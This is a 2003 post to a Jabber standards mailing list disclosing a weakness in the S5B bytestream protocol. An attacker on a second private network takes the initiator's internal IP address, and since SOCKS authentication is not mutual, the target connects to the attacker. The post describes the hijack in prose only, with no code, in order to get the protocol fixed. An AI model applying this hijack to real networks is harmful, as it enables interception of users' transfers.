[standards-jig] S5B vulnerability
justin-keyword-jabber.093179 at affinix.com
Sun Dec 7 05:52:13 UTC 2003
It seems that it is possible to hijack a connection rather easily with S5B
when there are two private networks involved.
Network 1 - external: 22.214.171.124, internal: 192.168.0.x
Client A - 192.168.0.32
Network 2 - external: 126.96.36.199, internal: 192.168.0.x
Client B - 192.168.0.40
Client C - 192.168.0.32
Client A wishes to contact Client B, and sends an S5B iq packet containing
188.8.131.52 and 192.168.0.32 as streamhosts. Client C, the attacker,
simply needs to set his machine's IP address to the same as Client A. When
Client B tries to connect to 192.168.0.32, it will end up connecting to the
attacker. Because the SOCKS authentication is not mutual, the attacker does
not have to worry about providing any credentials to the target.
Please correct me if I am wrong.
More information about the Standards